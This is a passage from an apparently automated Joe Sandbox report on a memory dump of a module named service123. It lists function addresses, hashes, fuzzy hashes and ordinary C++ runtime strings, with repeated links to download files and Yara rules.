Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: basic_string::_S_construct null not valid
API String ID: 0-290684606
Opcode ID: b92beb48b076f1baafb6ed11a761a100fc650e7b76927904f276dd66b29266dd
Instruction ID: f3938b5a59947c87801ed666703a4e5ac2941bc8c2f08247ab893f6439fc0a64
Opcode Fuzzy Hash: b92beb48b076f1baafb6ed11a761a100fc650e7b76927904f276dd66b29266dd
Instruction Fuzzy Hash: A1015EB15093449BCB406F5E80C465BFFECAF91228F94896DE4C947711C73AD4448F62

Function 6C2DA970 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2DA98D

Strings

basic_string: construction from null is not valid, xrefs: 6C2DA9B0

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 381a5f1927f93402b6d60122e4831a9b9dfdadc7077a6fb0df47067deca28399
Instruction ID: eb8bf04266401b4e88f122a02b4df1a33ffa2d2fc3c589bd53fe4cd60a103284
Opcode Fuzzy Hash: 381a5f1927f93402b6d60122e4831a9b9dfdadc7077a6fb0df47067deca28399
Instruction Fuzzy Hash: 6FF05EB1A152148FCB00EF2CC08089AB7F4BF55218B4208ADE8C49B311E632E959CF92

Function 6C2DA580 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C2DA59D

Strings

basic_string: construction from null is not valid, xrefs: 6C2DA5C0

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: 381a5f1927f93402b6d60122e4831a9b9dfdadc7077a6fb0df47067deca28399
Instruction ID: 9ea153ef9c4111851974f4160aee94bc2a6c492e509c93d76300e180c7b14577
Opcode Fuzzy Hash: 381a5f1927f93402b6d60122e4831a9b9dfdadc7077a6fb0df47067deca28399
Instruction Fuzzy Hash: 18F05EB1A152148FCB00EF2CC08085AB7F4BF55218B4209ADE8C49B315E632E959CF92

Function 6C2DC510 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

basic_string::substr, xrefs: 6C2DC568
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2DC570

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: e5d42e528f30e2bee499ac48c5240952b34169d790a8d28ba941ee0f33010913
Instruction ID: 8b2249dc102eef268a5db836c5275c9038787b2e9181109f91a4037992719d68
Opcode Fuzzy Hash: e5d42e528f30e2bee499ac48c5240952b34169d790a8d28ba941ee0f33010913
Instruction Fuzzy Hash: D5017C716182008BC704EF2CC48095AFBF5ABCA704F5489ADE488E7310D631D855CF97

Function 6C2D0740 Relevance: 2.5, Strings: 2, Instructions: 42COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C2D07A0
basic_string::substr, xrefs: 6C2D0798

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 6477339d768c9f0b62d75647ecd0a452038d80b82c7d92c58690f85faa751120
Instruction ID: 0918ed42a690978117816564758eb607a99619673e98846d869023bce9cbedf0
Opcode Fuzzy Hash: 6477339d768c9f0b62d75647ecd0a452038d80b82c7d92c58690f85faa751120
Instruction Fuzzy Hash: 920146B6A0A3009FD704DF29D881A9BFBE4ABC9350F00992DE588C7710C238D8448F97

Function 6C3749A0 Relevance: 2.4, APIs: 1, Instructions: 1198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4230c4f48d78238bf8b82e32d68bd92238c92d7988d38b9dd1f0ff7ae318177
Instruction ID: f6f68f70dc5f46abdaf95733362e96679c75dd779712e5086e47db6e419bfbb5
Opcode Fuzzy Hash: f4230c4f48d78238bf8b82e32d68bd92238c92d7988d38b9dd1f0ff7ae318177
Instruction Fuzzy Hash: B9624271A092008FC754EF79D9C449BB7F5BB8E244F009E2AE88597708E734E5498FA7

Function 6C2F46E0 Relevance: 2.1, APIs: 1, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef3b42fb1eeacc115d04a748c44ffd5c54e1da75fba0afac16554a8d6ef3dcd5
Instruction ID: 99cc4a4a90002806a404468eae0b1c676363464e0f20d2aa5ca95e736de21074
Opcode Fuzzy Hash: ef3b42fb1eeacc115d04a748c44ffd5c54e1da75fba0afac16554a8d6ef3dcd5
Instruction Fuzzy Hash: 4C829E70E4429D8FDB11CFA8C590B8DFBF1AF46314F298259E865AB795C3B09846CF41

Function 6C2F2CCE Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed11ddd09f9cfb45f9da01753d9568361bb49bc73311afeaaf40c462529ceb45
Instruction ID: 60138eca7d9730d1be15e85e260a39e8fabe55a5073460a203d9838e3de29cf6
Opcode Fuzzy Hash: ed11ddd09f9cfb45f9da01753d9568361bb49bc73311afeaaf40c462529ceb45
Instruction Fuzzy Hash: 2172A070A4829DCFDB11CFA8C484B8DFBF1BF06314F244619E8A5AB791D374A846CB52

Function 6C2F140E Relevance: 2.1, APIs: 1, Instructions: 811COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98763073e8b9e97e9c4a619b38b26a99e748018f911492d4c15fdaf154c471c2
Instruction ID: 1002e29e96e0a833d20187e2dab13f706b448296068e6781fcdf3c6ee12d44a7
Opcode Fuzzy Hash: 98763073e8b9e97e9c4a619b38b26a99e748018f911492d4c15fdaf154c471c2
Instruction Fuzzy Hash: 93729DB0A4829DCFDB11CFA8C090B8DFBF1AF05315F588659E8A5AB791C335D886CB41

Function 6C2F2090 Relevance: 2.0, APIs: 1, Instructions: 790COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e8d0f5d72c427111fb4b94ce7afe3114a621978f4d613744a3577527ae52d4d
Instruction ID: ef387a301c3a9671d5ba879f175b56c86ea2455f78fa8f6733545a2814e192ed
Opcode Fuzzy Hash: 2e8d0f5d72c427111fb4b94ce7afe3114a621978f4d613744a3577527ae52d4d
Instruction Fuzzy Hash: 24729EB0A492DD8FDB11CFA8C488B8DFBF1AF06315F148659E8A5AB781C3749846CB51

Function 6C2F07D0 Relevance: 2.0, APIs: 1, Instructions: 789COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5d92a272dad08b60ae4aeb17ba3a574b05d2e424975f5c645899679339b2d1a
Instruction ID: 0fc7b42029c86717c46b8f40d24ee9029ad862b6c57ed869724cdb8739d716ba
Opcode Fuzzy Hash: c5d92a272dad08b60ae4aeb17ba3a574b05d2e424975f5c645899679339b2d1a
Instruction Fuzzy Hash: 19729A70A4939DCFDB11CFA8C490B8DFBF1AF06315F188659E8A5AB781D734A846CB41

Function 6C2DF760 Relevance: 2.0, APIs: 1, Instructions: 770stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C2DF8B3

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction ID: de2eea87fdc07affb3ec0fa12825ac79a46e2430c33aa878a714843ce1a56cb1
Opcode Fuzzy Hash: 02536fe0dc21b9028167fedf7d8b1be13a2a62232735f22815451683cd99e0c3
Instruction Fuzzy Hash: D6728B74E04259CFCB04CFA8C08099EBBF2BF59315F298659E865AB7A1D730AC41CF55

Function 6C2F7A20 Relevance: 1.9, APIs: 1, Instructions: 678COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e70f47831f4cf6da25a962707fcc88b1172860dc3a345a13c99e17f1545901ca
Instruction ID: 2e1b090cab952aa9695758dea6a80836d3d0ce6a3b94e61e79a0f9900a40fec5
Opcode Fuzzy Hash: e70f47831f4cf6da25a962707fcc88b1172860dc3a345a13c99e17f1545901ca
Instruction Fuzzy Hash: F452CD70A4428D9FDB00CF69C49079DFBB1AF46328F28865AEC74AB792C735D846CB51

Function 6C2E2360 Relevance: 1.6, APIs: 1, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction ID: 8ceef9f45c894d59837afca37ecc2a7836b2a72f2af218664d044814f6126e5c
Opcode Fuzzy Hash: ff6372ef0a9251d138f0073624f0ea2ae09fccbdc705b561bfa349615f81e9fa
Instruction Fuzzy Hash: 8FE167B5E0525A8FCB11CFA9C484A9DBBF2AF4D314F588265E866B7391D334AC41CF60

Function 6C30DC70 Relevance: 1.6, APIs: 1, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction ID: 7c831080a79f16eaea3e09a4b4802b829e19475150e585b2f9b08a500913d746
Opcode Fuzzy Hash: ddce1dec344faf4ac185e2707990aaa8d0d8670dbd329984dcfd35d468b9a667
Instruction Fuzzy Hash: 9CD14D72B042598FCB10CF68C4806DDBBF1BF49328F588269E865AB791D335E945CFA0

Function 6C2CEB10 Relevance: 1.3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

Strings

__gnu_cxx::__concurrence_lock_error, xrefs: 6C2CEB50

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: __gnu_cxx::__concurrence_lock_error
API String ID: 0-1226115927
Opcode ID: 810096499a521c3d9287d99d47889e0b58bdcad3808aef6981daf560b1d5cc21
Instruction ID: 72079397abd0ead4d1cbf56179927f4ee19cb16fded7c85d40ee3e32d038e0b2
Opcode Fuzzy Hash: 810096499a521c3d9287d99d47889e0b58bdcad3808aef6981daf560b1d5cc21
Instruction Fuzzy Hash: 35E048B5E042058FC748EF34C58546BB7B16B99240F449A1DDC4153748D634D14CCF97

Function 6C2D0260 Relevance: 1.3, Strings: 1, Instructions: 20COMMON

Download Yara Rule

Strings

basic_string::at: __n (which is %zu) >= this->size() (which is %zu), xrefs: 6C2D0280

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID: basic_string::at: __n (which is %zu) >= this->size() (which is %zu)
API String ID: 0-3720052664
Opcode ID: 20dc63f5ece4a09fc0630d5aa6b4cba17ce9e310232ab11a472d7988299ffea6
Instruction ID: 097e7de02d7fca7e2b3bd8dd454d35cb73aaf4c88e623ae75f2d7a6f3f166e7a
Opcode Fuzzy Hash: 20dc63f5ece4a09fc0630d5aa6b4cba17ce9e310232ab11a472d7988299ffea6
Instruction Fuzzy Hash: 60E0B6B5E496408BCB04EF18C585819F7F1AFDA305F649A9DD58497720D235E510CE1B

Function 6C2FDBEE Relevance: .8, Instructions: 838COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9dbc76a1c964b1cf5b56335dcc03a157944483db64f816919c3de5e098569c1
Instruction ID: 9aeab2ac0a106c014edd0aa92f7a50c2ee0b2f836301062bb83bf2a3d55b2b0b
Opcode Fuzzy Hash: b9dbc76a1c964b1cf5b56335dcc03a157944483db64f816919c3de5e098569c1
Instruction Fuzzy Hash: 9B72DE74A4425DCFDB01CF68C490B9DFBB1AF06308F688659EC64ABB91D374D886CB91

Function 6C301510 Relevance: .7, Instructions: 684COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b16032d9497e705bda3416ba839065bf385511aedced4b252f0b01b04a42cda9
Instruction ID: 6d27908b01cc057f2802e4924d4b534ca5245c2dd903248094457222f1bfb2e5
Opcode Fuzzy Hash: b16032d9497e705bda3416ba839065bf385511aedced4b252f0b01b04a42cda9
Instruction Fuzzy Hash: 4B52DF76B05249CBDB10CF68C4847EDBBB1BF0630CF588259E854ABA91D335D986CFA1

Function 6C300060 Relevance: .7, Instructions: 683COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951944170.000000006C38F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951977607.000000006C3D8000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951993274.000000006C3D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2952010190.000000006C3DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2b0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd90c0762e041ef8c18a9693472e406881e06c6e637bcc6df878bab23cae0b9a
Instruction ID: ef536df4a817f2105befc66c7763a67e05586019deddec62b2b57346ee5a1d94
Opcode Fuzzy Hash: fd90c0762e041ef8c18a9693472e406881e06c6e637bcc6df878bab23cae0b9a
Instruction Fuzzy Hash: 1F52BF76B05289CFDB00CF68C4847DDBBB1BF0A318F148259E854ABA91D735D986CFA1

Function 6C300AC0 Relevance: .7, Instructions: 674COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2951858320.000000006C2B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2B0000, based on PE: true

Associated: 00000004.00000002.2951843277.000000006C2B0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2951927970.000000006C38D000.00000004.00000001.01000000.00000006.sdmpDownload File
